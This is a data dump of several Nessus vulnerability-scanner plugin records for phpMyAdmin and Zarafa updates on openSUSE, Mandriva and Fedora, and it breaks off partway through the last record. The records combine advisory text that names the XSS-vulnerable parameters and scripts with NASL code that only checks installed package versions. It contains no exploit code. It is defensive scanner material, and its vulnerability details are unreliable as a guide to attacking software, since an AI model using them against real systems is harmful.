{"nessus": [{"lastseen": "2021-08-19T12:48:50", "description": "This phpMyAdmin update addresses several security and non security issues :\n\n - This is a phpMyAdmin version upgrade (bnc#892401): (From 4.1.14.3) :\n\n - sf#4501 [security] XSS in table browse page (CVE-2014-5273)\n\n - sf#4502 [security] Self-XSS in enum value editor (CVE-2014-5273)\n\n - sf#4503 [security] Self-XSSes in monitor (CVE-2014-5273)\n\n - sf#4505 [security] XSS in view operations page (CVE-2014-5274)\n\n - sf#4504 [security] Self-XSS in query charts (CVE-2014-5273)\n\n - sf#4517 [security] XSS in relation view (CVE-2014-5273) (From 4.1.14.2) :\n\n - sf#4488 [security] XSS injection due to unescaped table name (triggers) (CVE-2014-4955)\n\n - sf#4492 [security] XSS in AJAX confirmation messages (CVE-2014-4986)\n\n - sf#4491 [security] Missing validation for accessing User groups feature (CVE-2014-4987) (From 4.1.14.1) :\n\n - sf#4464 [security] XSS injection due to unescaped db/table name in navigation hiding (CVE-2014-4349) (From 4.1.14.0 through 4.1.9.0) :\n\n - Numerous non-security bugfixes are listed at https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_14/ChangeLog", "cvss3": {"score": null, "vector": null}, "published": "2014-08-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1069-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987", "CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpMyAdmin", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-518.NASL", "href": "https://www.tenable.com/plugins/nessus/77432", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-518.\n#\n# The text description of this plugin is (C) SUSE 
LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77432);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4349\", \"CVE-2014-4955\", \"CVE-2014-4986\", \"CVE-2014-4987\", \"CVE-2014-5273\", \"CVE-2014-5274\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1069-1)\");\n script_summary(english:\"Check for the openSUSE-2014-518 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This phpMyAdmin update addresses several security and non security\nissues :\n\n - This is a phpMyAdmin version upgrade (bnc#892401): (From\n 4.1.14.3) :\n\n - sf#4501 [security] XSS in table browse page\n (CVE-2014-5273)\n\n - sf#4502 [security] Self-XSS in enum value editor\n (CVE-2014-5273)\n\n - sf#4503 [security] Self-XSSes in monitor (CVE-2014-5273)\n\n - sf#4505 [security] XSS in view operations page\n (CVE-2014-5274)\n\n - sf#4504 [security] Self-XSS in query\n charts	(CVE-2014-5273)\n\n - sf#4517 [security] XSS in relation view (CVE-2014-5273)\n (From 4.1.14.2) :\n\n - sf#4488 [security] XSS injection due to unescaped table\n name (triggers)(CVE-2014-4955)\n\n - sf#4492 [security] XSS in AJAX confirmation messages\n (CVE-2014-4986)\n\n - sf#4491 [security] Missing validation for accessing User\n groups feature (CVE-2014-4987) (From 4.1.14.1) :\n\n - sf#4464 [security] XSS injection due to unescaped\n db/table name in navigation hiding (CVE-2014-4349) (From\n 4.1.14.0 through 4.1.9.0) :\n\n - Numerous non-security bugfixes are listed at\n https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_\n 14/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892401\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/phpmyadmin/phpmyadmin/blob/MAINT_4_1_14/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-08/msg00045.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.3-1.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.3-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:33", "description": "Updated zarafa packages fix security vulnerabilities :\n\nRobert Scheck reported that Zarafa's WebAccess stored session information, including login credentials, on-disk in PHP session files. 
This session file would contain a user's username and password to the Zarafa IMAP server (CVE-2014-0103).\n\nRobert Scheck discovered that the Zarafa Collaboration Platform has multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448, CVE-2014-5449, CVE-2014-5450).", "cvss3": {"score": null, "vector": null}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : zarafa (MDVSA-2014:182)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0103", "CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64zarafa-devel", "p-cpe:/a:mandriva:linux:lib64zarafa0", "p-cpe:/a:mandriva:linux:php-mapi", "p-cpe:/a:mandriva:linux:python-MAPI", "p-cpe:/a:mandriva:linux:zarafa", "p-cpe:/a:mandriva:linux:zarafa-archiver", "p-cpe:/a:mandriva:linux:zarafa-caldav", "p-cpe:/a:mandriva:linux:zarafa-client", "p-cpe:/a:mandriva:linux:zarafa-common", "p-cpe:/a:mandriva:linux:zarafa-dagent", "p-cpe:/a:mandriva:linux:zarafa-gateway", "p-cpe:/a:mandriva:linux:zarafa-ical", "p-cpe:/a:mandriva:linux:zarafa-indexer", "p-cpe:/a:mandriva:linux:zarafa-monitor", "p-cpe:/a:mandriva:linux:zarafa-server", "p-cpe:/a:mandriva:linux:zarafa-spooler", "p-cpe:/a:mandriva:linux:zarafa-utils", "p-cpe:/a:mandriva:linux:zarafa-webaccess", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-182.NASL", "href": "https://www.tenable.com/plugins/nessus/77839", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:182. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77839);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0103\", \"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(68247, 69362, 69365, 69369, 69370);\n script_xref(name:\"MDVSA\", value:\"2014:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : zarafa (MDVSA-2014:182)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated zarafa packages fix security vulnerabilities :\n\nRobert Scheck reported that Zarafa's WebAccess stored session\ninformation, including login credentials, on-disk in PHP session\nfiles. 
This session file would contain a user's username and password\nto the Zarafa IMAP server (CVE-2014-0103).\n\nRobert Scheck discovered that the Zarafa Collaboration Platform has\nmultiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448,\nCVE-2014-5449, CVE-2014-5450).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0380.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zarafa-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64zarafa0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-MAPI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-archiver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-caldav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-dagent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-gateway\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-ical\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-indexer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-spooler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:zarafa-webaccess\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64zarafa-devel-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", 
reference:\"lib64zarafa0-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"php-mapi-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-MAPI-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-archiver-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-caldav-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-client-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-common-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-dagent-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-gateway-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-ical-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-indexer-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-monitor-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-server-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-spooler-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"zarafa-utils-7.1.8-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"zarafa-webaccess-7.1.8-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": 
"2021-08-19T12:48:58", "description": "Fixed multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.5, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-09-03T00:00:00", "type": "nessus", "title": "Fedora 19 : zarafa-7.1.10-4.fc19 (2014-9768)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zarafa", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9768.NASL", "href": "https://www.tenable.com/plugins/nessus/77484", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9768.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77484);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(69362, 69365, 69369, 69370);\n script_xref(name:\"FEDORA\", value:\"2014-9768\");\n\n script_name(english:\"Fedora 19 : zarafa-7.1.10-4.fc19 (2014-9768)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixed multiple incorrect default permissions (CVE-2014-5447,\nCVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has 
extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1133439\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8953ecaf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"zarafa-7.1.10-4.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:48:57", "description": "Fixed multiple incorrect default permissions (CVE-2014-5447, CVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.5, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-08-30T00:00:00", "type": "nessus", "title": "Fedora 20 : zarafa-7.1.10-4.fc20 (2014-9754)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5447", "CVE-2014-5448", "CVE-2014-5449", "CVE-2014-5450"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zarafa", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9754.NASL", "href": "https://www.tenable.com/plugins/nessus/77450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9754.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77450);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_bugtraq_id(69362, 69365, 69369, 69370);\n script_xref(name:\"FEDORA\", value:\"2014-9754\");\n\n script_name(english:\"Fedora 20 : zarafa-7.1.10-4.fc20 (2014-9754)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixed multiple incorrect default permissions (CVE-2014-5447,\nCVE-2014-5448 and CVE-2014-5449)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1133439\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb328207\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"zarafa-7.1.10-4.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:08:12", "description": "According to its self-reported version number, the phpMyAdmin install hosted on the remote web server is 4.0.x prior to 4.0.10.1, 4.1.x prior to 4.1.14.2, or 4.2.x prior to 4.2.6. 
It is, therefore, affected by the following vulnerabilities :\n\n - The 'TABLE_COMMENT' parameter input is not being validated in the script 'libraries/structure.lib.php' and could allow cross-site scripting attacks. Note that this issue affects the 4.2.x branch. (CVE-2014-4954)\n\n - The 'trigger' parameter input is not being validated in the script 'libraries/rte/rte_list.lib.php' and could allow cross-site scripting attacks. (CVE-2014-4955)\n\n - The 'table' and 'curr_column_name' parameter inputs are not being validated in the scripts 'js/functions.js' and 'js/tbl_structure.js' respectively and could allow cross-site scripting attacks. (CVE-2014-4986)\n\n - The script 'server_user_groups.php' contains an error that could allow a remote attacker to obtain the MySQL user list and possibly make changes to the application display. Note this issue only affects the 4.1.x and 4.2.x branches. (CVE-2014-4987)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-07-30T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.1 / 4.1.x < 4.1.14.2 / 4.2.x < 4.2.6 Multiple Vulnerabilities (PMASA-2014-4 - PMASA-2014-7)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_7.NASL", "href": "https://www.tenable.com/plugins/nessus/76915", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76915);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-4954\",\n 